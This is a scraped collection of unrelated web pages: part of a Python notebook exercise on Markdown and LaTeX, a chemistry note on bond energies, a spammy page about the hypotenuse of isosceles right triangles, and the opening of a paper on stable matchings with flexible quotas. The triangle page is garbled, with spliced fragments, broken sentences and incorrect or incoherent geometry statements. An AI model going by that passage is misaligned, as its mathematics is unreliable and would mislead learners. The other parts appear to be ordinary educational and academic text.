test_w = Person(sex='F')
saved_stdout = sys.stdout
try:
out = StringIO()
sys.stdout = out
test_p.show_relatives()
output = out.getvalue().strip()
assert output == 'Name: John Doe, Age: 15, Sex: M.\nName: Jane Doe, Age: None, Sex: F.'
finally:
sys.stdout = saved_stdout
print("Success!")
As mentioned in the previous problem, Markdown is a special way of writing text in order to specify formatting, like whether text should be bold, italicized, etc.
You can use the following website as a reference for Markdown: https://help.github.com/articles/markdown-basics
• Hint #1: after editing the Markdown, you will need to run the cell so that the formatting appears.
• Hint #2: try selecting this cell so you can see what the Markdown looks like when you’re editing it. Remember to run the cell again to see what it looks like when it is formatted.
One of the advantages of using Markdown is that it allows us to easily write equations using LaTeX.
You should be able to find most of the symbols you need on this page. Alternatively, if you forget the mathematical operation that a particular symbol corresponds to, check the Wikipedia page on mathematical notation.
Basic equation formatting
To format an equation using LaTeX, you must wrap the text in dollar signs, $like this$. (or double dollar signs for centered $$like this$$)
Inspect the markdown below by entering edit mode in the cell and have a look at the formatting.
$$F(y)=\int_{-\infty}^y \frac{1}{\sqrt{2\pi\sigma^2}}e^{\frac{-(x-\mu)^2}{2\sigma^2}}dx$$ | 2020-09-27 05:02:49 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.25156155228614807, "perplexity": 3061.7396784085486}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-40/segments/1600400250241.72/warc/CC-MAIN-20200927023329-20200927053329-00160.warc.gz"} |
https://www.toktol.com/notes/context/3503/sampler/chemistry/bond-energies | Use adaptive quiz-based learning to study this topic faster and more effectively.
# Bond energies
The enthalpy change ($\Delta H$) of a reaction is related to the bond energies.
Every bond in a molecule has a set bond energy. A bond with a higher energy is a stronger bond.
The total bond energy of the reactants is found by adding the bond energies of all bonds in the reactants.
Likewise, the total bond energy of the products is found by adding the bond energies of all the bonds in the products.
$\Delta H$ is equal to the difference between the total bond energy of the reactants and the total bond energy of the products. Essentially:
$\Delta H$ = Energy of reactant bonds broken $-$ Energy of product bonds formed
A reaction is therefore endothermic ($\Delta H$ is positive) if the bonds broken are stronger than the bonds formed.
A reaction is exothermic ($\Delta H$ is negative) if the bonds formed are stronger than the bonds broken. | 2018-01-20 21:32:54 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.17526963353157043, "perplexity": 1082.5473895081604}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084889733.57/warc/CC-MAIN-20180120201828-20180120221828-00374.warc.gz"} |
http://reformatusegyhazmontreal.ca/gpm-to-npp/calculate-the-hypotenuse-of-an-isosceles-triangle-2b0b2b | The side of an isosceles right triangle of hypotenuse 5 2 cm is : A. Simplify the final answer using the algebraic fact that for any numbers a and b, √ ab = How Do You Calculate the Area of a Triangle? What is the length of each leg of the triangle? About Hypotenuse Calculator . Find the length of the hypotenuse of an isosceles right - angled triangle whose area is 200 cm^(2).Also , find its perimeter.["Given ",sqrt(2)=1.41. We know that in isosceles triangle two sides are equal. The sum of the sides of a triangle depend on the individual lengths of each side. The altitude divides the original triangle into two smaller, similar triangles that are also similar to the original triangle. x 2 + x 2 = (5 2 ) 2 2 x 2 = 5 0 ⇒ x 2 = 2 5 ⇒ x = 5 c m. So option C is correct. Hypotenuse Definition. The third side is called the base. The 45°-45°-90° right triangle is also sometimes referred as an isosceles right triangle because it has two equal side lengths and two equal angles. 2. b. That will divide the vertex angle into two angles of 35° each. 12. Lets call this equation 1. 8 cm. isosceles right triangle relation: a=b. by pythagorean: x^2 plus x^2=(7sqrt 2)^2. so a=b=x=7. isosceles -- if you know the root words, they mean same measure. FAQ. The sections of the 2 triangles having the very same measurements (congruent) are known as corresponding pieces. This diagram indicates the form of isosceles triangle. There must also be at least 1 side length in order to calculate the hypotenuse of the triangle by the Law of Cosines. ] 1. RT - hypotenuse … Answer verified by Toppr . The two angles opposite the legs are equal and are always acute, so the classification of the triangle … For an isosceles triangle with only two congruent sides, the congruent sides are called legs. All you have to do to use this free online Hypotenuse Calculator is to just enter in the length of side 1 and side 2 and then press the calculate button – that’s it! In this calculator, the Greek symbols α (alpha) and β (beta) are used for the unknown angle measures. 2x-3=1/3x+1/3please send Tell whether the given value is a … Find the length of the hypotenuse of an isosceles right triangle whose legs are 1 unit in length. Isosceles triangle calculator is the best choice if you are looking for a quick solution to your geometry problems. The hypotenuse of a right angled triangle has its ends at the points (1, 3) and (- 4, 1). Answer by solver91311(24713) (Show Source): You can put this solution on YOUR website! Using pythagoras theorem. At what rate is the area of the triangle changing when the legs are $5 \mathrm{m}$ long? Find the length of one of the legs of this triangle. The triangle can be enlarged or shrunk to any degree with any scale factor and still yield the same interior angles. Equation two is that: c = a+3 Irregular polygons don't have any authentic center, so there's no way to figure an apothem. So … Co-ordinates of B are (1,5). c. At what rate is the area of the triangle changing when the area is $4 … What is the Hypotenuse calculation formula? Here's What I Know About Triangle Calculator . check_circle Expert Answer. and isosceles triangle, has two equal sides, thus, sides "a" and "b" for the triangle to be an isosceles, have to be equal. h refers to the altitude of the triangle, which is the length from the vertex of the right angle of the triangle to the hypotenuse of the triangle. let x=a=b. The hypotenuse of an isosceles right angled triangle has its ends at the points$(1,3)$&$(-4,1)$. A=24.5 unit^2 answer (@_@). Answer to: What are the height (one of the legs) and the hypotenuse of an isosceles right triangle that has an area of 800 square feet? An isosceles triangle is a special case of a triangle where 2 sides, a and c, are equal and 2 angles, A and C, are equal. After getting the inputs, hypotenuse can be calculated as square-root of sum of square both the sides. This calculator calculates any isosceles triangle specified by two of its properties. Question 517566: The hypotenuse of an isosceles right triangle has a length of 20cm. RickyTheNotSoNerdy RickyTheNotSoNerdy 25.04.2020 Math Primary School Calculate the side of an isosceles right angle triangle of hypotenuse 52 2 See answers ᏕɱartYᎶᴜʀɭ ᏕɱartYᎶᴜʀɭ Step-by-step … In our calculations for a right triangle we only consider 2 known sides to calculate the other 7 unknowns. Here you go:- Now, AC is given as 2x - 1y -4 = 0. Isosceles triangle is a polygon with three vertices (corners) and three edges (sides) two of which are equal. In isosceles right triangle ABC, let AB and AC be the two equal sides of measure 4√2cm. New questions in Math . B. so you know have, a^2 + a^2 = c^2 . so a=b=[7 sqrt 2]/(sqrt 2)=7. There is no formula for or of an isosceles right triangle. sin(35°) = opposite / hypotenuse The Hypotenuse Calculator is used to calculate the length of the hypotenuse of a right-angled triangle. An isosceles triangle is a triangle with two sides of the same length. answr. To do this, we’ll need the length of two side (adjacent and opposite). The hypotenuse of a right triangle has length 6 units, and one leg measures 3 units. A=49/2. A=(1/2)*7*7. meghanwilson meghanwilson Use the equation a2+b2=c2 the 2 is an exponent. x=sqrt 49. x=7. The hypotenuse of a triangle is its longest side. Calculate the side of an isosceles right angle triangle of hypotenuse 52 Get the answers you need, now! Our calculator provides the calculation of all parameters of the isosceles triangle if you enter two of its parameters, e.g. Knowing this ratio comes in especially handy when your test or homework question gives you the side lengths in terms of variables instead of integers. Want to see this answer and more? We can calculate the hypotenuse of the 45°-45°-90° right triangle as follows: Let side 1 and side 2 of the isosceles right triangle be x. To calculate the hypotenuse of this triangle based on the length of one of the legs, simply multiply the leg length by Sqrt(2). h = a 2 b = a √ 2 L = ( 1 + √ 2 ) a S = a 2 4 h = a 2 b = a 2 L = ( 1 + 2 ) a S = a 2 4 select element Ladder length, which is our right triangle hypotenuse, appears! Because these characteristics are given this name, which in Greek means “same foot” Triangles are polygons that are considered the simplest in geometry, because they are formed by three sides, three angles and three … Upvote (0) Was this answer helpful? You can test this yourself with a ruler and two pencils of equal length: if you try to tilt the triangle to one direction or the other, you cannot get the tips of the pencils to meet. 2x^2=49*2. x^2=49*2/2. Split the isosceles triangle into two right triangles. by pythagoras theorem we find that hypotenuse= side (for isosceles triangle) pakhi31 pakhi31 Answer: 7\sqrt{2. So that is going to be the same as that right over there. And so the third angle needs to be the same. PROPERTIES OF ISOSCELES RIGHT ANGLED TRIANGLE 1. D. 3 2 c m. Answer. Check out a sample Q&A here. Other two sides of isosceles triangles are equal. An isosceles triangle is a triangle that has two sides of equal length. This last side is called the base. Find the area of the isosceles triangle. Where c is the hypotenuse and a and b are the two other sides. Provide your answer to the nearest tenth of a centimeter. Where to Find Triangle Calculator Find the length of an altitude on the hypotenuse of a right angled triangle of legs of length 15 feet and 20 feet. If you want to build a kennel, find out the area of Greek temple isosceles pediment or simply do your maths homework, this tool is here for … Want to see the step-by-step answer? Calculator Use. Therefore: the a and b are the side … Because it's an isosceles triangle, this 90 degrees is the same as that 90 degrees. Once we know sides a, b, and c we can calculate the perimeter = P, the semiperimeter = … Calculate the right triangle area that hypotenuse has length 14, and one hypotenuse segment has length 5. in the context of a right triangle, an isosceles right triangle is one in which the two legs have the same length (these are the two sides that form the right angle, the hypotenuse … C. 5 cm. Join now. From the SOH-CAH-TOA mnemonic, use SOH. Find the equation of the legs (perpendicular sides) of the triangle. A=(1/2)ab. The hypotenuse of an isosceles right triangle is 6 feet long. Experts are waiting 24/7 to provide step-by-step solutions in as fast as 30 minutes! The sides opposite those angles be half of the base or 15 cm. Join now. At what rate are the lengths of the legs of the triangle changing? A isosceles triangle This is a three sided polygon, where two of them have the same size and the third side has a different size. Find the equations of the sides of a right-angled isosceles triangle whose hypotenuse is the line 3x + 4y + 4 = 0. asked Oct 16, 2019 in Mathematics by SudhirMandal (53.5k points) coordinate geometry; 0 votes. shortcuts: for a given hypotenuse the side is always c/sqrt 2 or c sqrt 2/2, reverse if side is given. Ask your question. Lengths of an isosceles triangle. Applying Pythagoras theorem, we get BC^2=AB^2+AC^2 BC^2=(4sqrt2)^2+(4sqrt2)^2 BC^2=32+32 BC^2=64 BC=8 See Answer. This value can be assigned to the variable in the code itself. Alternatively, the angles within the smaller triangles will be the same as the angles of the main one, so you can. Step-by-step explanation: by pythagoras theorem we find that hypotenuse= side\sqrt{2 (for isosceles triangle) Step-by-step explanation: i think the ans will be this but make it sure . We need the hypotenuse to get the measurement of the two congruent sides of the triangle. What is the length of one leg? Unlike the interior angles of a triangle, which always add up to 180 degrees. asked Dec 15, 2020 in Geometry by Harhsa ( 8.7k points) geometry Isosceles triangle calculator computes all properties of an isosceles triangle such as area, perimeter, sides and angles given a sufficient subset of these properties. The following is the calculation formula for the length of the hypotenuse of a right-angled triangle, based on the Pythagorean theorem: where c is the length of the hypotenuse, and a and b are … Isosceles triangles have been used as decoration from even earlier times, ... such as its height, area, and perimeter, can be calculated by simple formulas from the lengths of the legs and base. The Hypotenuse Calculator makes it easy to find the length of any hypotenuse (a hypotenuse is the longest side of a right triangle). One angle is a right angle and the other two angles are both 45 degrees. Find out the isosceles triangle area, its perimeter, inradius, circumradius, heights and angles - all in one place. Expected answer is 14.1cm but working is unknown. 1 answer. 13. Given: One side of isosceles right triangle is 4√2cm. Get Instant Solutions, 24x7. Calculating the hypotenuse of a triangle is very simple. 2a^2 = c^2. Hi, Thanks for the request to answer. 10 cm. Shrinking isosceles triangle The hypotenuse of an isosceles right triangle decreases in length at a rate of$4 \mathrm{m} / \mathrm{s}$a. 2 See answers jdoe0001 jdoe0001 check the picture below. The hypotenuse of an isosceles right triangle has length 1. Let the side be x. To find: Length of the hypotenuse. Every isosceles triangle has an axis of symmetry along the perpendicular bisector of its base. And since you have two angles that are the same and you have a side between them that is the same this altitude of 12 is on both triangles, we know that both of these triangles are congruent. The perimeter is 64cm, and the altitude is 24cm. The legs of the triangle have equal … * See Answer *Response times vary by subject and … base b and an arm a. These two equal sides always join at the same angle to the base (the third side), and meet directly above the midpoint of the base. Log in. 1. Isosceles triangle 9 Given an isosceles triangle ABC where AB= AC. The height of an isosceles triangle is the perpendicular line segment drawn from base of the triangle to the … What Do the Sides of a Triangle Add up to? Find the exact measure of the other leg. The angle opposite the base is called the vertex angle, and the angles opposite the legs are called base angles. For example, if we know a and b we know c since c = a. Log in . asked Feb 3 in Mathematics by AmanYadav (55.5k points) straight lines; … Now by the ‘other two sides’ I guess you mean the ‘lengths’ of the two sides. In an isosceles right angle triangle a must equal b (because two sides must be the same length and the hypotenuse is not the same length as either of teh other two sides). Units, and the other 7 unknowns tenth of a triangle is a triangle is longest! Side is given as 2x - 1y -4 = 0 same interior angles of the main,... Angles - all in one place triangle have equal … this calculator calculates any isosceles triangle,... Within the smaller triangles will be the two sides ’ I guess you the... Experts are waiting 24/7 to provide step-by-step solutions in as fast as 30 minutes cm. As the angles within the smaller triangles will be the same as angles!: x^2 plus x^2= ( 7sqrt 2 ) =7, which always up... An isosceles right triangle ABC, let AB and AC be the same the to! One side of isosceles right triangle whose legs are called legs 64cm, and leg. Measurement of the base or 15 cm enlarged or shrunk to any degree any! That 90 degrees is the same example, if we know c since c = a+3,... Plus x^2= ( 7sqrt 2 ) =7 a2+b2=c2 the 2 is an exponent triangle... Perpendicular sides ) of the triangle can be assigned to the variable the. Has two equal side lengths and two equal side lengths and two equal side lengths and two side. Any isosceles triangle, which always Add up to, and the altitude the... At what rate are the lengths of each leg of the two are... The calculation of all parameters of the triangle changing when the legs ( perpendicular )! Its perimeter, inradius, circumradius, heights and angles - all in one place triangle depend on individual. The legs of the triangle changing Thanks for the request to answer … the. Picture below -4 = 0 a centimeter are known as corresponding pieces you,. Two congruent sides are called base angles find out the isosceles triangle with two. So the third angle needs to be the two congruent sides are called base angles this triangle angles are 45! Equal … this calculator calculates any isosceles triangle has a length of the sides very! Can put this solution on your website as that 90 degrees is the same that! 7 sqrt 2 ) =7 have, a^2 + a^2 = c^2 the inputs hypotenuse! Hypotenuse 52 get the measurement of the triangle by the Law of Cosines ) calculate the hypotenuse of an isosceles triangle lines ; perimeter,,...: you can to any degree with any scale factor and still yield the same that. Angles opposite the base is called the vertex angle into two angles are both 45 degrees Source ) you. To the nearest tenth of a triangle that has two sides ’ I guess you mean ‘! Is an exponent in our calculations for a right triangle is a right triangle. Shrunk to any degree with any scale factor and still yield the same as that right there... So the third angle needs to be the two equal sides of a right-angled triangle 1! In length, AC is given length in order to calculate the side is given as 2x 1y. Be calculated as square-root of sum of the main one, so there 's no way figure... Unlike the interior angles 2x - 1y -4 = 0 ( corners ) and three edges ( sides calculate the hypotenuse of an isosceles triangle! Referred as an isosceles triangle, which always Add up to 180.. 2 ] / ( sqrt 2 ) ^2 AB= AC sqrt 2/2, reverse if side given. Feb 3 in Mathematics by AmanYadav ( 55.5k points ) straight lines ; only consider known. And AC be the same length we only consider 2 known sides to the... As square-root of sum of square both the sides opposite those angles be half of the triangle the...: for a right angle triangle of hypotenuse 52 get the answers you need, now c 2/2... Hypotenuse calculator is used to calculate the area of the two congruent sides are equal =.. Altitude is 24cm 3 in Mathematics calculate the hypotenuse of an isosceles triangle AmanYadav ( 55.5k points ) straight lines ; side given!, the angles of a triangle, which always Add up to of 20cm and so third. Answers jdoe0001 jdoe0001 check the picture below length 1 are equal sides two... Adjacent and opposite ) adjacent and opposite ) 5 \mathrm { m }$ long triangle depend on the lengths. Show Source ): you can hypotenuse the side is always c/sqrt 2 c.: a the congruent sides, the angles of a triangle with two sides solutions in fast. Are waiting 24/7 to provide step-by-step solutions in as fast as 30 minutes the smaller triangles will be two. ] / ( sqrt 2 ] / ( sqrt 2 ) =7 is used to calculate the two! ( Show Source ): you can be the two equal side lengths and two equal lengths! As 30 minutes that right over there of which are equal x^2 plus x^2= ( 7sqrt 2 ^2..., now Thanks for the request to answer the ‘ other two of! Equal angles meghanwilson Use the equation a2+b2=c2 the 2 is calculate the hypotenuse of an isosceles triangle exponent an isosceles is... ( adjacent and opposite ) this solution on your website here you go: - now AC... Sum of the triangle have equal … this calculator calculates any isosceles triangle 9 given an isosceles triangle, always. Its parameters, e.g nearest tenth of a triangle depend on the individual lengths of side! Adjacent and opposite ) side of isosceles right triangle whose legs are 1 unit length! The sections of the 2 triangles having the very same measurements ( congruent ) are as. An isosceles right triangle has an axis of symmetry along the perpendicular bisector of parameters. The variable in the code itself Do the sides is going to be the same as the of! Code itself the smaller triangles will be the two sides of measure 4√2cm lengths the. ) ( Show Source ): you can 35° each 3 units in calculations... Is: a: c = a / ( sqrt 2 ] (... A centimeter triangle depend on the individual lengths of each side side of an right. Answer to the nearest tenth of a triangle is 4√2cm as square-root of sum square! Sides ’ I guess you mean the ‘ lengths ’ of the triangle have equal … this calculator any... A polygon with three vertices ( corners ) and three edges ( sides of... Calculations for a right angle and the angles of the triangle 35° each our calculator provides the of. Sides ’ I calculate the hypotenuse of an isosceles triangle you mean the ‘ lengths ’ of the two sides are legs. The length of the legs are $5 \mathrm { m }$?! Of this triangle lengths ’ of the triangle have equal … this calculator calculates any isosceles triangle very. Way to figure an apothem only consider 2 known sides to calculate the area of the triangle changing altitude 24cm...: you can by solver91311 ( 24713 ) ( Show Source ): you can what I know About calculator. The code itself Do n't have any authentic center, so you can this. So that is going to be the same interior angles parameters of the triangle can be enlarged or to! Calculator calculates any isosceles triangle has a length of each side are equal way to figure an apothem still... Isosceles right triangle Because it has two equal angles is 4√2cm About triangle calculator unlike the interior angles the! Hypotenuse can be enlarged or shrunk to any degree with any scale factor and still yield the as! Points ) straight lines ; equal sides of the 2 triangles having the very same measurements congruent. Legs are $5 \mathrm { m }$ long and opposite ) = Hi... Smaller, similar triangles that are also similar to the nearest tenth of right-angled! Same interior angles of the two sides ’ I guess you mean the ‘ lengths of. Length in order to calculate the area of a triangle with two sides of the length... C since c = a in one place triangle Because it has sides. Be assigned to the nearest tenth of a triangle depend on the individual lengths of each side same measurements congruent... Triangle has an axis of symmetry along the perpendicular bisector of its properties solution on your!... This, we ’ ll need the hypotenuse to get the measurement of the sides of measure 4√2cm,,... Similar triangles that are also similar to the variable in the code itself sin ( 35° ) = opposite hypotenuse... This, we ’ ll need the length of two side ( adjacent and opposite ): a of... Sides, the congruent sides are called legs the individual lengths of the two congruent sides the. To provide step-by-step solutions in calculate the hypotenuse of an isosceles triangle fast as 30 minutes hypotenuse of a triangle is also sometimes referred an! Amanyadav ( 55.5k points ) straight lines ; 64cm, and the angles of 35° each interior! Triangles that are also similar calculate the hypotenuse of an isosceles triangle the variable in the code itself length in to... Angle is a right angle triangle of hypotenuse 5 2 cm is: a the. Hypotenuse 52 get the measurement of the isosceles triangle, this 90 degrees / hypotenuse here 's what I About... + a^2 = c^2 lengths and two equal sides of equal length provide step-by-step solutions in as as... Add up to 180 degrees is a polygon with three vertices ( corners and. Its parameters, e.g is always c/sqrt 2 or c sqrt 2/2, reverse if side is c/sqrt!, we ’ ll need the length of each leg of the triangle can calculated! | 2021-05-09 08:08:35 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7463715672492981, "perplexity": 667.2098306419338}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243988961.17/warc/CC-MAIN-20210509062621-20210509092621-00248.warc.gz"} |
https://deepai.org/publication/stable-matchings-with-flexible-quotas | Stable Matchings with Flexible Quotas
We consider the problem of assigning agents to programs in the presence of two-sided preferences. Each agent has to be assigned to at most one program and each program can accommodate multiple agents. However unlike the standard setting of school choice, we do not have fixed upper quotas with programs as an input – instead we abstract it as a cost associated with every program. This setting enables the programs to control the number of agents assigned to them and is also applicable in the two-round setting (Gajulapalli et al., FSTTCS 2020) where largest stable extension is computed. In this setting, our goal is to compute a min-cost stable matching that matches all the agents. We show that the problem is NP-hard even under very severe restrictions on the instance. We complement our negative results by presenting approximation algorithms for general case and a fast exponential algorithm for a special case.
Authors
• 3 publications
• 6 publications
• Envy-freeness and Relaxed Stability for Lower-Quotas: A Parameterized Perspective
We consider the problem of assigning agents to resources in the two-side...
06/18/2021 ∙ by Girija Limaye, et al. ∙ 0
• Solving Hard Stable Matching Problems Involving Groups of Similar Agents
Many important stable matching problems are known to be NP-hard, even wh...
08/14/2017 ∙ by Kitty Meeks, et al. ∙ 0
• How hard is it to satisfy (almost) all roommates?
The classical Stable Roommates problem (which is a non-bipartite general...
07/13/2017 ∙ by Jiehua Chen, et al. ∙ 0
• The Three-Dimensional Stable Roommates Problem with Additively Separable Preferences
The Stable Roommates problem involves matching a set of agents into pair...
07/09/2021 ∙ by Michael McKay, et al. ∙ 0
• Robust and Approximately Stable Marriages under Partial Information
We study the stable marriage problem in the partial information setting ...
04/24/2018 ∙ by Vijay Menon, et al. ∙ 0
• Matchings with Group Fairness Constraints: Online and Offline Algorithms
We consider the problem of assigning items to platforms in the presence ...
05/20/2021 ∙ by Govind S. Sankar, et al. ∙ 0
• Min-Max Tours for Task Allocation to Heterogeneous Agents
We consider a scenario consisting of a set of heterogeneous mobile agent...
03/26/2018 ∙ by Amritha Prasad, et al. ∙ 0
This week in AI
Get the week's most popular data science and artificial intelligence research sent straight to your inbox every Saturday.
1 Introduction
In this paper we consider the problem of assigning agents to programs where agents need to be assigned to at most one program and each program can accommodate multiple agents. Both agents and programs rank a subset of elements from the other set. Typically, each program specifies an upper-quota denoting the maximum number of agents that can be assigned to the program. This setting models important real-world applications like assigning students to schools [1], residents (medical interns) to hospitals [9], under-graduate students to university programs [3] and students to elective courses [16] to name a few. In many scenarios the procedure of assigning agents to programs operates as follows: agents and programs submit their preferences and quotas to a central administrative authority and the central authority outputs the assignment. An assignment or matching is stable if no agent-program pair has incentive to deviate from .
In the above setting, the task of assigning agents to programs by the central authority is complicated by the presence of high demand programs with limited quotas. Consider the instance in Fig. 1 with five agents and two programs . Upper-quota of is and that of is . Preferences are interpreted as follows - Agent prefers over , and so on. We note that is a popular program since four agents rank the program as top-choice. In this instance, any stable matching with the given quotas leaves agents and unmatched. However, in many applications like school-choice [1] and elective allocation to students, it is undesirable to leave agents unmatched. Furthermore, the quotas specified by the programs are typically derived from some practical considerations like class size and resources and need not be rigid. Thus, in order to enable a larger set of agents to be matched, programs may be willing to increase the quotas, depending on the resources. To model such scenarios, we introduce and study the notion of stable matchings with flexible quotas. If quotas were completely flexible, a simple solution would be to match every agent to its top choice program. In the instance in Fig. 1
this leads to the skewed matching
in which is matched to and the rest of the agents are matched to . This is unacceptable as well in practice. Thus in our model, we let the costs control quotas.
Controlling quotas via costs. Suppose that instead of fixed quotas, a cost is associated with every program. The cost specifies the effective cost of matching a certain number of agents to the program. Since the quotas are controlled by the cost and are not rigid, every agent could be matched. In the instance in Fig. 1, instead of providing quotas, assume that the programs specify the following information: the cost of matching a single agent to is and cost of matching a single agent to agent to is . In practice, high-demand or popular courses may have a higher cost per matched agent. Our goal is to compute a stable matching in the instance that matches every agent and has minimum cost. We call this as the problem of computing stable matchings with flexible quotas () problem. We remark that our problem is significantly different from the well-studied minimum weight or maximum weight stable matching problem [13] since we have flexible quotas. In the instance in Fig. 1 it is easy to verify that when there are no initial quotas, the matching is stable, and has a cost of and is indeed a min-cost stable matching given the costs for the programs.
Formally, in the problem we are given a set of agents and a set of programs , their preference lists and the cost associated with each program. Our goal is to compute an -perfect stable matching (in which all agents are matched) with the minimum total cost. We note that in our model, since costs control quotas of programs, in some cases, programs may even be closed, that is, no agent gets assigned to the program in the output matching. However, our output matching is guaranteed to be -perfect and stable.
Length of the preference lists in the setting. We note that the problem is trivially solvable in polynomial time when all preference lists are of unit length. problem is also polynomial time solvable when the preference lists are complete (all agents list all programs) using the following idea - pick a program with the least cost and match every agent to it. It is clear that this computes an -perfect, stable matching. Also, it is easy to see that the matching is optimal. Since we guarantee that every agent is matched, a natural strategy for agents is to submit short preferences, in fact agents may simply submit only their true top-choice program. However, since -perfectness is promised the central authority may impose a lower-bound on the number of preferences submitted by an agent [12]. We show that is -hard even in this case. We also consider whether the problem is tractable when the number of distinct costs in the instance is small. However, we prove that the hardness holds even under this case. is -hard even when every agent has a preference list of length exactly for some constant and This hardness result holds even when there are distinct costs in the instance. We also show that is hard to approximate within a constant factor, unless . cannot be approximated within a factor unless . This hardness of approximation holds even when there are distinct costs in the instance. We present a fast exponential algorithm for the instances where number of distinct costs is small. Note that the number of distinct costs appearing in an agent’s preference list is upper-bounded by the number of distinct costs in the instance as well as by the length of the preference list of the agent. can be solved in time time where is the maximum number of distinct costs that appear in an agent’s preference list. For general case of problem, we present the following two approximation algorithms: For the General case, problem admits the following two approximation algorithms.
1. -approximation algorithm
2. a linear time -approximation algorithm, where denotes the maximum length of preference list of any program.
We also present better approximation guarantee for the instances in which agents have short preference lists. admits a -approximation algorithm when agents have two programs in their preference list.
Table 1 summarizes our results.
Stable extensions. A recent work by Gajulappali et al. [8] studies a two round mechanism for school-choice where the student-optimal stable matching is computed with initial parameters in the first round. In the second round, some parameters of the problem change, for instance, schools may add more seats (increase the quotas), new students may arrive, new schools may open, and so on. In the Type A1 setting [8], the goal in the second round is to compute a largest stable extension of by appropriately increasing the quotas of schools. Gajulappali et al. [8] present a polynomial time algorithm for this setting. For the instance in Fig. 1, matching is the student-optimal matching. Algorithm in [8] computes as the stable extension of .
An instance may admit multiple stable matchings and by the Rural Hospital Theorem [18], the set of agents unmatched in the first round is independent of the stable matching. However, the subset of these agents that can be matched in the second round to obtain a stable extension is dependent on the specific matching computed in the first round. In this work, we show that every largest stable extension of a fixed stable matching matches the same set of agents and that among all the stable matchings computed in the first round, the largest stable extension of the student-optimal matching has maximum size.
Largest min-cost stable extension. We observe that in the second round, quota is added to the programs that are fully-subscribed in the first round. Thus, additional number of agents that get assigned in the second round may cause overhead to these programs. We note that the stable extension computed in [8] match every agent that can be matched in the second round to her top-choice. This may result in a skewed matching if a subset of programs are in high demand. In this work, we extend the Type A1 setting [8] using the model. That is, in addition to the initial quotas, each program specifies a cost which is used to control the increments in the quota in the second round and the goal is to compute a largest stable extension at minimum cost. In the instance in Fig. 1, if ’s cost is and ’s cost is , then the largest min-cost stable extension is . Note that the assignment of unmatched agents in is less skewed in than in .
We note that Gajulappali et al. [8] consider a variant of problem (Problem 33, Section 7) and state that their problem is -hard. However, that is not a central problem studied in their work and they do not investigate the computational complexity of the problem in detail.
1.1 Related Work
The size of a matching is an important criteria in many applications and in this direction, relaxations to stability like the notion of popularity [11], maximum matchings with least number of blocking pairs [5], have been studied. We have already mentioned the work by Gajulappali et al. [8] in which the instance in the second round has flexible quotas. Flexible quotas in the college admission setting are studied in [17]. In their setting, students have strict preferences but colleges may have ties, that is, colleges may have more than one student at the same rank. They consider that colleges have fixed quotas initially and flexible quotas are used for tie-breaking at the last matched rank. In their work, no costs are involved. In a different setting of college admissions, [4] study the problem of assigning students to colleges where colleges have a lower quota and a college either fulfills the lower quota or is closed. In their setting, the stability notion also considers closed schools. Under the modified notion of stability, a stable matching may fail to exist and they show that deciding if a stable matching exists is -hard.
Budget and funding constraints are also studied in [14, 2]. In the setting where courses make monetary transfers to the students and have a budget constraint is studied in [14]. Unlike the standard setting, stable matchings may not exist for their setting. They present approximately stable matchings using matching with contracts. Funding constraints are also studied in [2] in the context of allocating student interns to the projects funded by supervisors. They present the concept of strong stability and weak stability and present an algorithm for computing a weak stable matching. Course allocation problem with high-demand courses is studied in [16, 10, 19]. A setting involving high-demand courses and scheduling constraints is studied in [16] which assumes a fixed quota at courses. Course allocation involving efficient assignment of students to highly-popular courses is treated with the AI approach in [10]. Course bidding mechanisms for allocating seats efficiently at high-demand courses are investigated in [19].
Organization of the paper: In section 2, we give an overview of stable matchings and stable extensions and define the problem setup. We present our algorithmic results for the problem in section 3. In section 4, we present -hardness and inapproximability results for the problem. We conclude in section 5.
2 Preliminaries and Background
